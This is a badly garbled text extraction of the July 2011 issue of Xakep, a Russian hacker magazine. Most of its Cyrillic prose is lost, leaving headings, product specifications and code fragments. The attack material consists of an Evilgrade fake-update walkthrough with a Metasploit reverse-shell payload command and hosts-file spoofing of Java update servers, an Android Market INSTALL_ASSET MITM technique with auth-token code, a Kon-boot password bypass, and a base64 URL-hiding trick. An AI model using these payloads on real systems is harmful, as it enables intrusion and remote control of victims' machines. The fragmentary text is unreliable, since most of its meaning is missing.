Хакер 2011 07 PDF

.
210
:

x 07 (150) 2011
07 (150) 2011
[1-150]. C 1999
[1-150]
150
c 1999

:
18-25

XSS Heap overflow
SQL-
, null-byte gigabyte
Black Hat

5

nikitoz@real.xakep.ru
VZLOM
INTRO
150 , 1999 .
, dial-up, ,
DALnet, Pentium MMX Windows 98
. BBS ,
. : 80 85 2-3 ,
10 , , . -
- 10 ,
- .
, ip , . ,

, , 1999
,
.
, 12.5 , ,
. ,
: ,
.
, : , , IT .
,
12.5 : , ,
, , , , , , ,
, , , , ,
M.J.Ash, , , , , NSD,
, , , ,
, , , . !
nikitozz,
Content
MegaNews
004
Ferrum
016
022
SSD-
WEXLER.BOOK T7002
PC_Zone
024
028
033
034
038
Android-
084
088
!
Must have

094
098
102
106
110
Proof-of-Concept
040
044
050
054
060
062
066
Easy-Hack

-. Opera

0day

MALWARE
068
?
,
072
...
, , !
EXE- Python'
076
Positive Hack Days 2011

080

, ? !
Mac OS X
,
: TDD Android
SYN/ACK
114
118
Cisco

LAMP

124
(L)AMP FreeBSD
PHREAKING
130
Kinect:

Music Maker 16
X-Tools
SCADA

Facebook

Dropbox, VK, Flikr
Android: ?
7 - 2011
KDE4 GNOME3
136
140
143
144
FAQ UNITED
FAQ
8.5
WWW2
web-
024
Android-

Android: ?
LibreOffice
094
Mageia
Linux Mint
136
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
>

> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)

/ART
>-

>

/PUBLISHING
>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906
>

>

>

>

>

>

>

.: (495) 935-7034, : (495) 545-0906
> TECHNOLOGY
(komleva@glc.ru)
>PR-
(grigorieva@glc.ru)
>
(olgaeml@glc.ru)
(alekhina@glc.ru)
> xakep.ru
(xa@real.xakep.ru)
>
(polikarpova@glc.ru)
>
(maligina@glc.ru)
>
( )
(strekneva@glc.ru)
>

>

> -
(alekseeva@glc.ru)
> MAN TV

>
101000, , , / 652,

,

77-11802 14.02.2002
Zapolex,
.
219 833 .
>

>

.

. ,
,
.

.
.

:
content@glc.ru
, , 2011
>
(kosheleva@glc.ru)
>
(lukicheva@glc.ru)
> :
DVD-: claim@glc.ru.
>

: (495) 545-09-06

: (495) 663-82-77

: 8-800-200-3-999
MEGANEWS
Mifrill (mifrill@real.xakep.ru)
Meganews
GOOGLE
Google
,
.
, , .
Google Wallet Citigroup, MasterCard, First Data
Sprint.
,
,
(, BlingTag). NFC (Near Field
Communication).
, Google NFC-. Google Wallet
Android, Google ,
,
.
Google Wallet,
,
. Google eBay PayPal,
.
, Google
eBay . eBay
,

... Google. 2011

, , -
Google, -

,
PayPal. eBay ,

. ,
Google Wallet -
. , eBay PayPal
.
Google -
( ).
20
000 ,
.
Android. ,
,
.
, Rustock,
. Microsoft ,
: , 427 000 email-.

, -
. ( )
, , ,
. ,
, ,
. ,
. The
Guardian :
,
( ).
, 12
, !
300
World of Warcraft. ,
5000-6000 , $900. ,
,
004
.
. , ,
, . :
, XXI .
X 07 /150/ 2011
MEGANEWS
+70%
Apple . iMac,
iPad, iPhone .
:
21,5", Intel Core i5 2,5 , AMD 6750M GDDR5 512 ,
500 , $1199;
21.5", i5 2,7 , AMD 6770M 512 , 1 , $1499;
27", i5 2,7 , AMD 6770M 512 , 1 , $1699;
27", i5 3,1 , AMD 6970M 1 , 1 , $1999.
,
Intel Core i5, Core i7 3,4 ,
2 , SSD- 256
, 8 . iMac,
, /
Thunderbolt ( 21,5-
27-).
FaceTime HD
. : iMac
- ,
IPS-, FireWire 800, 4 USB 2.0, SDXC, SuperDrive (DVD-RW), Gigabit

Ethernet Wi-Fi (802.11n 2,4/5 Bluetooth 2.1+EDR). .
Seagate
3,5 , 1 .
625 /
..
30
, , , . 22- -
, 30
. , IT-
,
.
( 4chan Zoklet) ,
. ,
. ,

. - ,
,
Sony PlayStation. , ,
, Tor, , ,
IP. , ,
.
Dropbox ,
300 . 5 !
Dropbox 100 .
006
X 07 /150/ 2011
MEGANEWS

EDIFIER
Edifier , MP15
MP3-, .
, ( USB-), 6 .
, .
: 200x60x33 ,
200 . MP15 SD- . - 21,5" (40) . MP3-
,
.
Symantec . ,
, 70%
, 68%
, 56%
,
.

,
HP

,
Wi-Fi. Wi-Fi Mobile Mouse ,
HP,
,
Wi-Fi (
Link-5).

, , ,
. Wi-Fi Mobile Mouse -
,
USB- .
10 ,
9 . , ?
. HP, ,
: HP Wi-Fi Mobile Mouse
. , ,
1600
(CPI).
$50.

, . , . -
. . : 7 , 0,6 , CO 8 .
25 .
008
X 07
MEGANEWS
, . . ,
, , -
, , , . ...
. , . .
, , ,
.
Massive Multiplayer Online War Game
Leveraging the Internet (MMOWGLI),
mmowgli.nps.edu. , , ,
, , . MMOWGLI .
-, ,
, . , , ,
.
, , ,
.
, .
, , ,
.
.

, 2010
3 .
,
60-
,

.
:
, . ,
, , ,
. ,
, (
),
.
,
! ,
,
.
, .
, ,
,
(
) . , ,
, . ,
, ,
24-
.

Samsung .
, . Samsung
, .
, ,
010
, , : NC215S.
. ,
,
,
(
).
,
,

, , ,
.
X 07 /150/ 2011
MEGANEWS
, ,

,
.
Facebook,
: Facebook Google .
PR- Burson-Masteller,
WPP,
,
Microsoft. ,
, :
Google,
,
(
).
Facebook ,
Burson-Masteller

Google.
, ,
,
computerworld.
com. , ,
, ,
Facebook ( ). Burson-Masteller ,

,
. BursonMasteller .
Google ,
, , Facebook
.
, Google, ,
20% Microsoft Windows.
, Chrome OS.
ZEUS ,

, ZeuS SpyEye,
, .

. : ZeuS
, ,
. -

,
, .
, (
$10 000, )
. ,
,
,

-. ,
. ,

. ,
, stand-alone-
. , :
wasm.ru :).
()

.

, .

,
US Copyright Group, . US
Copyright Group ,
, 23 000
. -
012
.
6500 ,
, , 23
322 IP-, , ,
. -
, .
, ,
. ,
,
.
$150 000. , ,
,
$3000.
X 07 /150/ 2011

, ,

,
( ,
- ).
() -
(NUST)

.
.
, : -

, . :
, 1 , , 0.
, . ,
. ,
, . ,
, 160
20 . ,
.
.
, , FAT32,
4 .
sciencedirect.com/science/article/pii/S016740481000088X, , , .
- VESTEL
Connected TV Vestel, c 55
, . ( ) -,
, , , , , , .

3D ( , , ),
3D-. 3D-
, 3D
. , 2D 3D. ,
.
,
3D 3D-.
WWDC 2011 ,
54 Mac, 3/4
MacBook.

NASDAQ. IPO (Initial Public
Offering

)

.
YNDX.
IPO
- X 07 /150/ 2011
. , 2010 Mail.ru Group

16,8% .
NASDAQ 24 18:30
, 1 . :
IPO 8,03 .

$25 . $35
. , 11,2
.
LinkedIn, NASDAQ . !
013
MEGANEWS
MICROSOFT SKYPE
Microsoft
IP- Skype
$8,5 . , Skype
.
2005 , Skype
eBay $2,6 , , 2009
, Skype
$1,9
( ). Skype
170 , ,

.
Microsoft ? . IT- , , Skype
Xbox, Kinect Windows Phone

, Microsoft.
,
Microsoft Skype! . , stand-alone Lixux, Mac
OS . Skype
Microsoft .
Skype (Tony
Bates). ,
.

,

Apple (iPhone iPad
3G-)

Android. ,

,
.
, Apple
, ,
,
, . . -, Apple Google
,
. ,

Wi-Fi. -, . , Apple ,
. ,
,
. ,
, ,
7-10
. Apple
, iOS 4.3.3.
,
, iTunes
.
, -, , Apple
Google
.
.
, , Google 50

.
SONY
, - Sony.
Sony
GeoHot , ,
.
,
( ,
014
Sony
), -
Geohot
. ,
PlayStation Network,
. Sony
, , ,
,
, , , . Sony .
.
. , ,

, .
? . -,
PlayStation Network.
,
,

. ,
email-, -
,

. , . -,
SQL-
Sony-Ericsson.
-, Sony BMG ,
Sony Music Japan. ,
!
( thehackernews.com).
, Sony
.
, , ,

, . , Sony
,
. ,

.
X 07 /150/ 2011

, Sony.
,
.
, . , Microsoft Windows Phone 7
.
7392, 3 , ,
. ,
, . Google,
. , Google ,
root-, .
: Failed to fetch license for [ ]
(error 49). , , ,
.
, ?
Netflix,
, Netflix -. ,
, Netflix, ,
.
:
2010 , 3,3 1,7 .
Netflix 22 800 000 ,
$706 2011 .
, 8 ,
, ,
, .
, ( )
. , . ,
iPhone, iPad, XBox, PlayStation 3 .
,
, , ,
, ... ,
,
, . .
X 07 /150/ 2011
015
FERRUM

SSD-
SSD
.

,
.
SSD ?
SSD HDD ,
, flash- ( ), . ,
, , USB-,
. , -
HDD .

, .
SSD.
, . -,
, flash-,
, RAID 0.
-. , , SSD
, ,
. ,

,
NAND-.

, SSD . ,
,
, NAND-
. , MLC-,
SSD, 10000
/, SLC-
. , ,
, SSD- .
,
SSD. .
, ,
. HDD,
. SSD
-, NAND-.
4 , 512
. SSD ,
HDD. 512 ,
, -
016
: Intel Core i7-975 Extreme, @ 3466

: ASUS P6X58D Premium
: NVIDIA GeForce GT 240
: Kingston 99U5471-002.A00LF
@1333 , 32
: Corsair CSSD-F120GB2, 120

: FSP EPSILON 80 PLUS, 900
: Windows 7 x32
, . ,
. , , , SSD .

TRIM, (Windows 7
Windows Server 2008), . ,
,
, . ,
SSD ,
.

SSD
,
. PCMark Vantage, , Windows
Windows Movie Maker.
IOmeter, ,
( 128 ), (
4 ). ( ) ,
- . , ATTO Disk Benchmark
/ 0,5 8192 .
SSD 100%
, .
.
, BIOS
ACHI.
X 07 /150/ 2011
3500 .
5900 .
Corsair
CSSD-F40GB2
Corsair
CSSD-F90GB2-BRKT
-: 2,5
: SATA II
: MLC
: SandForce SF-1200
: 280 /
: 270 /
: 1
: 40
-: 2,5
: SATA II
: MLC
: SandForce SF-1200
: 285 /
: 275 /
: 1
: 90
Corsair CSSD-F40GB2 SSD-

. ,
. , . ,
, .
, .
SandForce SF-1200,
40- . , ,
Corsair CSSD-F90GB2-BRKT. ,
HDD ,
, SSD Corsair
CSSD-F40GB2. ,
,
. 40 ,
Corsair CSSD-F40GB2 RAID 0, ,
.
Corsair CSSD-F90GB2-BRKT, ,
. 90
, ,
(, ). SSD .
, Corsair CSSD-F40GB2.
PCMark Vantage.
,
? , TRIM , ,
. ,
. Corsair CSSD-F90GB2-BRKT,
3,5- .
! , Corsair CSSD-F90GB2-BRKT
, , , ,
.
.
.
, - Program Files
.
3,5- .
X 07 /150/ 2011
.
:
.
.
017
FERRUM
4500 .
n/a
Kingston
SVP100ES2/64G
OCZ
OCZSSD2-2VTX60G
-: 2,5
: SATA II
: MLC
: Toshiba T6UG1XBG
: 230 /
: 180 /
: 1
: 64
-: 2,5
: SATA II
: MLC
: SandForce SF-1200
: 285 /
: 275 /
: 2
: 60
,
SSD. Kingston SVP100ES2/64G
TOSHIBA T6UG1XBG, 230 / 180 / . ,
, .
, Kingston SVP100ES2/64G
.
, ,
128- AES. Kingston,

. , , ,
.
, Kingston SSD
: ,
SATA, ,
2,5- HDD, Kingston SVP100ES2/64G,
USB 2.0.
Kingston , ,
.
OCZ OCZSSD2-2VTX60G
Vertex. Vertex .

230/135 /
( 64 ).
, . 60- Vertex 2,
OCZ OCZSSD2-2VTX60G, , 285 /
, . 275
/. ,
OCZ OCZSSD2-2VTX60G Corsair
CSSD-F90GB2-BRKT.
, OCZ SSD- Vertex.
SandForce SF-2200, 500
/ . ,
Vertex 2 (- ,
, 120 ),
, SSD .
.
SSD.
.
018
2 .
.
3,5- .
X 07 /150/ 2011
7100 .
4800 .
Silicon Power
SP128GBSSDE20S25
Transcend
TS64GSSD25S-M
-: 2,5
: SATA II
: MLC
: JMF616
: 250 /
: 230 /
: n/a
: 128
-: 2,5
: SATA II
: MLC
: JMicron JMF612
: 240 /
: 110 /
: 1 .
: 64
, 40, 60 64,
,
SSD. Silicon Power SP128GBSSDE20S25
128 NAND-,

. , .
- - . , Silicon Power SP128GBSSDE20S25
, ,
.
249,99 /, . , ,
, 202 / .
,
. , .
, , , Silicon Power SP128GBSSDE20S25
. 128 , .
Transcend
TS64GSSD25S-M. ,

7 9 / . Transcend TS64GSSD25S-M
. .
SSD Transcend TS64GSSD25S-M ,
.
, , ,
Transcend TS64GSSD25S-M ,
.
Transcend TS64GSSD25S-M . ,

SSD- .
, ,
,
SATA II .
.
.
.
.
.
X 07 /150/ 2011
019
FERRUM

PCMark Vantage,
IOmeter random 4 , /
Corsair CSSD-F40GB2
Corsair CSSD-F40GB2
Corsair CSSD-F90GB2-BRKT
Kingston SVP100ES2/64G
OCZ OCZSSD2-2VTX60G
OCZ OCZSSD2-2VTX60G
Silicon Power SP128GBSSDE20S25

Transcend TS64GSSD25S-M
Read
Write
0 5000 10000 15000 20000 25000 30000 35000
Who is who PCMark Vantage
10
15
20
25
30
IOmeter Patterns, /
Database
Fileserver
Workstation
Webserver
IOmeter sequential 128 , /
Corsair CSSD-F40GB2
Corsair CSSD-F40GB2
OCZ OCZSSD2-2VTX60G
OCZ OCZSSD2-2VTX60G
Read
Write
0
10
20
30
40
50
60
70
-, ,

50
100
150
200
250
300
PCMark Vantage, /
Windows Defender
Gaming
Importing Pictures to Windows Photo Gallery
Windows Vista startup
Video editing Windows Movie Maker
Winndows Media Center
Adding music to Windows Media Player
Application loading
Corsair CSSD-F40GB2
OCZ OCZSSD2-2VTX60G
0,00
50,00
100,00
150,00
200,00
250,00
PCMark Vantage , SSD

, . .
, Corsair CSSDF40GB2.
020
. OCZ OCZSSD2-2VTX60G.
SSD CSSDF90GB2-BRKT , 2
, . z
X 07 /150/ 2011
FERRUM

WEXLER
BOOK T7002
: 7 , 800x480,
, LED-
: 4 + microSD (
16 )
: USB 2.0,
: ANSI, TXT,
PDF, HTML,
FB2, PDB, EPUB
: JPG,
JPEG, BMP, GIF
: WMV, RM, AVI,
RMVB, 3GP, FLV, MP4, MPEG,
MKV
: MP3, WMA,
FLAC, AAC
: ,
:
, , ,
: 190x120x6
: 300
: USB, ,
, , ,

2033
: 12
WEXLER.BOOK T7002 WEXLER,

, . ,
, .

WEXLER.BOOK T7002
. .
, ,
. MicroSD, 3,5- - , Mini USB.
, ,
, .
, . , . Play/
Pause, , . , , , .
.
, ,
...
LED- 800480 . . 4
, -
MicroSD.
WEXLER.BOOK T7002 : TXT, PDF,
FB2, EPUB . ,
, , JPG 31623162 .
: WMV,
AVI, MPEG MKV. ,
2 /. WEXLER.BOOK T7002
, MP3, WMA, FLAC AAC.
022
WAV (32/45 /). :

.
, .
, . : ,
, .
,
, .
, , .

Play/Pause.
, ,
.
, .
, , ,
Sokoban.
, .
. ,
. :
! , AV-,
.
. ?
,
WEXLER.BOOK T7002 . ,
, .
2033. z
X 07 (150) 2011
PC_ZONE

ANDROID-

Android: ?
Android , Google
.
,
?
. Android HTC Dream/
G1 2008 .

Motorola Droid 2009 .
, ,
. Google I/O
: 400 000
! : , , . 100
Android. . ,
Google , . ,
.
, Google
GTalkService. ,
024
-
, . ,
GTalkService.
?
? ? ,
- ?
GTalkService
Android TCP/SSL/
XMPP- GTalk. ,
.
GTalkSerive. (
heartbeat-) Google,
X 07 /150/ 2011
HTTP://WWW
links

(jon.oberheide.
org).
Google
,
. Google .
GTalkService
.
C2DM (Cloud to Device Messaging Framework),
,
, ( ,
). , C2DM
, . , Android
: REMOVE_ASSET INSTALL_ASSET,
Google .
, Android Market , REMOVE_ASSET
GTalkService,
. , ,
. .
Google INSTALL_ASSET, Android APK- . :
Google .
, . - MITM SSL- GTalkService
INSTALL_ASSET,
- ? ?

Google, Android-.
.
, -
GTalk Service Monitor

. , GTalkService, ,
: SSL. ,

. - (
SSL 125 ][). SSL , , Google.
INSTALL_ASSET,
. . ,
- , ,
? Google , . ,
,
GTalkService INSTALL_ASSET. ?
. , ,
,
Android Market. Install , GTalkService INSTALL_ASSET,

APK- . ,
Android
Andoid Market
INSTALL_ASSET
5
GTalk Service
Android Market
Google
C2DM
APK-
APK-
X 07 /150/ 2011
025
PC_ZONE
POST- Android Market

:
INSTALL_ASSET . -, ( , SSL-)
:
1. Android-, Android Market.
2. CA- /system/etc/security/
cacerts.bk, keytool portecle.
3. MITM-, sslsnif (www.thoughtcrime.org)
CA-.
, GTalkService ,
, CA, .
- Android Market , ,
, INSTALL_ASSET.
:
tickle_id: 1277687266074
assetid: -155863831473120556
asset_name: Replica Island
asset_type: GAME
asset_package: com.replica.replicaisland
asset_blob_url: http://android.clients.
google.com/market/download/Download?assetId=
-155863831473120556&userId=986032118775&
deviceId=1094117203906638597
asset_signature: Ayn2bWDqckQkKsBY4JurvCFpYN0
asset_size: 5144485
,
Android Market. asset_signature. ,
INSTALL_ASSET,
. , . ,
, base64 APK- (..
),
Android Market. ,
APK-
. ,
INSTALL_ASSET (,
, ) . SSL- GTalkService,
,
, ! , ,
. ,
, ,
MITM-.
- .
, , ,
. ,
, Android
GTalkService.
026
protobuf
Android Market
, GTalkService Android Market. .

. , :
1. Android Market.
2. .
3. Install.
4. .
5. .
. , ,
. Android Market, ( )
,
GTalkService. (. ) :
1. Android
Market.
2. POST- Android Market.
3. Android Market
C2DM.
4. C2DM
INSTALL_ASSET GTalkService.
5. GTalkService INSTALL_ASSET
Vending-.
6. Vending- APK- ,
, .
, , , POST-,
. Android
Market, , , ? .
:
POST /market/api/ApiRequest HTTP/1.1
Content-Length: 524
Content-Type: application/x-www-form-urlencoded
Host: android.clients.google.com
Connection: Keep-Alive
User-Agent: Android-Market/2 (dream DRC83); gzip
version=2&request=CuACCvYBRFFBQUFLOEFBQUJvZWVEVGo4eGV4OVR
JaW9 . . .
, request,
. Google, ,
, protobuf (code.
google.com/p/protobuf) base64.
. ,
:
X 07 /150/ 2011
authToken , .
, , , - .
! Account Manager Android,
. , -
Twitter ,
Twitter-
AcountManager, .
authToken,
Android Market.
,
:
1{
1: "DQAAAK8AAABoeeDTj8xex9TIio . . ."
2: 0
[... ...]
13: "-606db3000d480d63"
}
2{
10 {
1: "353999319718585473"
}
}
-, : ,
. ,
, , , , Market
. , protobuf,
Android Market, ,
.
code.google.com/p/android-market-api
API,
(, ..). ,
.
Android-
, ,
. , :
[.. ..]
message InstallRequest {
optional string appId = 1;
}
message RequestContext {
required string authToken = 1;
[.. ..]
required string androidId = 4;
optional string deviceAndSdkVersion = 5;
[.. ..]

(, , ..).
appId authToken:
appId
Android Market. ,
Android Market , protobuf .
authToken ClientLogin,
Android Market
.
X 07 /150/ 2011
AccountManager accountManager =
AccountManager.get(getApplicationContext());
Account acct = getAccount(accountManager);
accountManager.getAuthToken(acct, "android",
false, new GetAuthTokenCallback(), null);
? , , protobuf-, ,
POST- Android Market.
( , ),
GTalkService , ,
INSTALL_ASSET,
! ,
( ),
. !
,
Android Market,
, . .
, ,
.

Android Market (
), ! . PoC- Angry Birds Bonus
Levels, Android
Market. :
.
,
:
,
-.
,
. ,
PoC Google,
.
, , . ,
Android Market, , INSTALL_ASSET .
Vending- INSTALL_ASSET
, , . , . ! , (
),
. z
027
PC_ZONE
(ale ks.raiden@gmail.com)
7
- 2011

- . .
, , .
.
1. SQL
- .
.
SQL , , noSQL,
-. ,
,
, :
?. -
,
, .
-
028
. SQL-, , .

. ,
, JSON
messagePak, Google ProtoBuf Apache Thrift. MongoDB
, JSON . Redis
key-value-, , , . noSQL-
get (
), set ( ), delete (
), update ( ).
X 07 /150/ 2011
HTTP://WWW
links

,
.
Apache Nuvem (incubator.apache.org/nuvem)
cloud-, Amazon EC2, Microsoft Azure
Google AppEngine. , .
Deltacloud (incubator.apache.org/deltacloud) Ruby,
( ) cloud. REST-, .
libcloud (libcloud.apache.org)
Java Python,
.
Simplecloud (simplecloudapi.org) ,
Zend_Cloud,
, cloud - Zend Framework
.
- - (DHT).
noSQL ,
. DHT ,
, . ,
. ,
! ,
,
, . , ,
.
,
,
noSQL-
. 100 ,
.
. Facebook noSQL- Cassandra Twitter,
Cassandra HBase.
X 07 /150/ 2011
API
,
,

Node.JS:
nodejs.org;
PHPFog :
www.phpfog.com;
Erlang:
www.erlang.org;
Scala:
www.scala-lang.org;
Akka:
akka.io;
WebSokets
websocket.org;
Cloud9:
cloud9ide.com;
PhoneGap:
www.phonegap.com.
2. JavaScript

029
PC_ZONE
PHPFog
-
. JavaScript. :
, -
JS-. (.. )
, .
! :
JS : , ?
, :
. .
.
, , PHP-,
: ,
. :
, . JavaScript
, ,
, .
. ,
( callback
). ,
, .
Node.JS (
139 ][). V8,
JavaScript, Google Chrome . .
Node.JS .
HTTP- ( , 10
) . ,
Nginx-, Node.JS .
3.

, , JavaScript.
Python Twisted Tornado,
Ruby EventMachine, PHP phpDeamon
fastcgi, Java Netty.
,
. , Erlang,
Ericsson. , ,
Erlang ,

. ,
030
Github .
!
. : ,
,
. .
Scala. ,
- . , Twitter,
, Ruby-
Scala! - . Scala
Akka, , , ,
. ( ,
,
).
, .
4.
-, -
, . ,
, ,
. , (
Comet),
-. ,
HTTP ,
. ,
Flash , ?
HTTP : ,
- .
, .
: -
. HTML5 (
)
WebSockets, , .
- ?
, (
) .
. ,
X 07 /150/ 2011
, memcached,
.
-. !
NodeJS
. . , .
, .
: !
Nginx, 1.0.3, ,
. -
, ,
( ,
), . -
JavaScript . Node.JS
.
,
(
).
5.

,
, , , IT- . ,
cloud-
. Dropbox.
,
Amazon S3. .
.
.
. .
X 07 /150/ 2011
-
,
. 16
. ,
. , ,
Amazon ( , ), EC2. ,

. (Platform as a Service PaaS) ,
. .
,
. , PHP, Ruby
Rails, Python Node.JS,
MySQL, , NoSQL MongoDB, Redis Riak.
memcached, FTP

Git. -,
: memcached,
.
, . git clone
&& git push
, , .
API,
031
PC_ZONE
!

.
. - ,
GitHub . Git
. - , :
, .
,
, .
(-), ,
. Github
, - ,
-. .
: ( Opensource) Github , , , . , , Github
,
. ,
.
,
. , Cloud9 (c9.io), GitHub ,
.
jQuery
, , .
cloud- : AppEngine,
PHPFog, Azure, RackCloud.
6.
Git. , , FTP SVN

.
Git. ,
? Git-,
, ,
, Git.
: ,
. . Github (github.com), , ,
Git- -
. , ,
. ,
032
7.
. . ,
.
.
, JS-
( API ),
. jQuery Mobile
( alpha-),
,
, Blackberry, Windows Phone, webOS,
bada . , ,
jQuery, API . ,
,
.
,
- ,
. z
X 07 /150/ 2011
PC_ZONE
Step twitter.com/stepah
,
. ? ,
/CD .
.
Kon-boot,
CD
,

Windows (
) root
Linux-. (,

). ,
- ,
CD (, , )
- .
CD- (
Linux-),
.
, ?
.
1.
UNetbootin (unetbootin.
sourceforge.net) , .
2.
Kon-boot. ,
CD- ( ),
!
, .
,
. (www.piotrbania.com/all/kon-boot) Floppy image.
3.
UNetbootin,
Floppy.
4. ,
UNetbootin. <Enter>,
krypto logic.
:).
syslinx.cfg (bit.ly/mqKZ8R).
X 07 /150/ 2011
, . ,
syslinux, 1st Kon-Boot,
2nd try boot from drive
C: as hd1. krypto logic
,
.. hd2 .. ,
.
5. krypto logic
,
. , :
Linux
kon-usr:
KonBoot
2
Ubuntu 8.04 torpeda tty1

torpeda login: kon-usr
# id
uid=0(root) gid=0(root)
# whoami
root
Windows
,
.
Kon-Boot
,
Linux
root.
Ubuntu,
Linux.
Kon-Boot Windows-. ,
(TASM 4.0) X86-32.
Kon-Boot , www.kryptoslogic.com
,
Kon-Boot
3
,
32/64-
Windows-. z
033
PC_ZONE
ant

. :

. !
,
, .
, - . -
: . , ,
.
, Skype Java? .
, , ,
- . ,

. - ,
.
034
.
,
.
:
(
);
DNS (,
update.app1.com);
DNS- (, 192.168.1.1);
(, lastupdate.xml),
X 07 /150/ 2011
sunjava
Evilgrade + Metasploit
Evilgrade
, ;
,
http://update.app1.com/update.exe .
. ,
,
.
- . ,

, . MITM-, , ARP-
DNS-. ,
, . Infobyte Security
Research (www.infobytesec.com/developments.html)
Perl
. Evilgrade
:
Teamviewer 5.1.9385;
Notepad++ 5.8.2;
Java 1.6.0_22 winxp/win7;
Appleupdate <= 2.1.1.116 ( Safari 5.0.2
7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8
1675);
Windows update (ie6 lastversion, ie7
7.0.5730.13, ie8 8.0.60001.18702, Microsoft works);
Winamp 5.581;
VirtualBox (3.2.8 );
Filezilla;
Flashget;
Miranda;
Skype;
Trillian <= 5.0.0.26;
Adium 1.3.10 (Sparkle Framework);
VMware;
..
. Evilgrade
, Web- DNS-,
X 07 /150/ 2011
Evilgrade agent, (payload). , ,

. ,
agent, , Evilgrade
(, , agent). ,
Evilgrade
payload Metasploit. :
> set agent '["/metasploit/msfpayload windows/shell_reverse_tcp
LHOST=192.168.1.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'
, windows/shell_
reverse_tcp, 4141
192.168.1.2. <%OUT%> ,
( /tmp,
a.exe). , , :
Metasploit, ,
Evilgrade.
.
.

Blackhat Arsenal & Defcon 2010.
Evilgrade
Perl,
. ,
Active Perl (www.activestate.
com/activeperl)
: IO::Socket::SSL Net::SSLeay.
,
ppm
. :
WARNING
warning
.

.
ppm install http://www.sisyphusion.tk/ppm/NetSSLeay.ppd

ppm install http://www.sisyphusion.tk/ppm/IOSocket-SSL.ppd
Evilgrade
. Metasploit,
Evilgrade : -
035
PC_ZONE

, . help, :
configure < >
;
reload ;
restart Web- DNS-;
set ;
show .
:
options ;
vhosts ;
modules ;
active ;
start Web- DNS-;
status Web-;
stop Web- DNS-;
, .
. . ,
, ,
. , , Java,
,
. , .
, : ,
Java, , (c Evilgrade)
. ,
, , ,
ARP-spoofing DNS Cache Poison.
(
) hosts ,

:
192.168.1.2
192.168.1.2
java.sun.com
javadl-esd.sun.com
Evilgrade. :
, :
> show options
:
Name = Sun Microsystems Java
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"]
Description = ""
VirtualHost = "(java.sun.com|javadl-esd.sun.com)"
.-------------------------------------------------------| Name
| Default
| website | http://java.com/moreinfolink
| enable | 1
| atitle | Critical vulnerability
| arg
| http://java.sun.com/x.jnlp"
| adesc
| This critical update fix internal vulnerability
| descr
| This critical update fix internal vulnerability
| agent
| ./include/sunjava/JavaPayload/FunnyClass2.jar
| title
| ritical update
-------------+------------------------------------------
agent,
(payload) Metasploit. ,
,
. FunnyClass2.jar. reverseshell,
2010 .
, 2010 .
include\sunjava\JavaPayload\ :
java -cp "JavaPayload.jar:lib/*" javapayload.handler.
stager.StagerHandler ReverseSSL 192.168.1.2 2010 -- JSh
.
atitle adescription. ,
, Java
,
. ,
set. , , :
perl evilgrade
, show
modules. , ,
sunjava. , ,
:
> conf sunjava
036
> set atitle "New version available"
.
show options, . ,
.
start.
X 07 /150/ 2011
Evilgrade
, Evilgrade -
.
,
. .
, ,
. Evilgrade
Perl, , ,
Perl-, :
1. :
package modules::sunjava;
use strict;
use Data::Dump qw(dump);
2. $base, :
, ,
, , ,

:
'name' => 'Sun Microsystems Java',
'version' => '2.0',
'appver' => '<= 1.6.0_22',
'author' => [ 'Name Surname < mail +[AT]+ mail.com>' ],
'description' => qq{},
'vh' => '(java.sun.com|javadl-esd.sun.com)',
,
:
'req' => '(/update/[.\d]+/map\-[.\d]+.xml|/
update/1.6.0/map\-m\-1.6.0.xml)',
, . , , Java,
Update, Update Now.
Evilgrade.
show status:
client = 192.168.1.1
module = modules::sunjava
status = send
(md5,cmd,file) = d9a28baa883ecf51e41fc626e1d4eed5,'',
".include/sunjava/JavaPayload/FunnyClass2.jar"
, 192.168.1.1. , ,
, ,
reverse shell . help , .
,
. ,
X 07 /150/ 2011
,
:
'options' =>
{ 'agent' =>
{ 'val' => './agent/java/javaws.exe',

'desc' => 'Agent to inject'},
'arg'
=> { 'val' => 'http://java.sun.com/x.jnlp',
'desc' => 'Arg passed to Agent'},
'enable' => { 'val' => 1, 'desc' => 'Status'},
DVD-.
, - . , .
, . ( , ,
), Evilgrade, ,
.
? Evilgrade ,
https
,
,
.
, - . z
037
PC_ZONE
PROOF-OF-CONCEPT
Proof-of-Concept (POC) ,
, .
-
poc@real.xakep.ru.
, tiniurl
C1jb2xvcjogIzAwMDsKfQo8L3N0eWxlPgo8L2hlYWQ+Cjxib
2R5PgpUaGlzIHBhZ2UgaXMgaG9zdGVkIG9uIDxhIGhyZWY9I
mh0dHA6Ly90aW55dXJsLmNvbSI+dGlueXVybC5jb208L2E+C
jwvYm9keT4=
'#' base64, ,
:
var hsh = document.location.hash;
hsh = hsh .substring(1, hsh .length);
document.write(decode64(hsh ));
// decode64 , base64
, '#', .
RFC URL ,
base64 html- , , . ,
data. , :
HTTP://WWW
links

:
malaya-zemlya.
livejournal.
com/639054.html
038

malaya-zemlya.livejournal.com.
URL,

URL' bit.ly, goo.gl tinyurl.com.
- ,

. .
. , .
, .
, , , tinyurl.com/3nghu2l.

:
http:///.html#PGhlYWQ+CjxzdHls
Z4KYm9keSB7CiAgY29sb3I6ICNGRjY7CiAgYmFja2dyb3VuZ
<img src="data:image/gif;base64,R0lGODlhEAAOAL
MAAOazToeHh0tLS/7LZv/0jvb29t/f3//Ub//ge8WSLf/
rhf/3kdbW1mxsbP//mf///yH5BAAAAAAALAAAAAAQAA4AAA
Re8L1Ekyky67QZ1hLnjM5UUde0ECwLJoExKcppV0aCcGCmT
IHEIUEqjgaORCMxIC6e0CcguWw6aFjsVMkkIr7g77ZKPJjP
ZqIyd7sJAgVGoEGv2xsBxqNgYPj/gAwXEQA7" width="16"
height="14"/>
(, ,
base64):
data:[< >][;base64],<>
,
, , ,
- , ...
. ,
;). z
X 07 /150/ 2011
>> coding

GreenDog (agrrrdog@gmail.com)
Easy Hack
1
:

.
:
, ,

, . (,
<ctrl+alt+del>)
.
.
Process
Explorer . Tasklist.
. ,
.
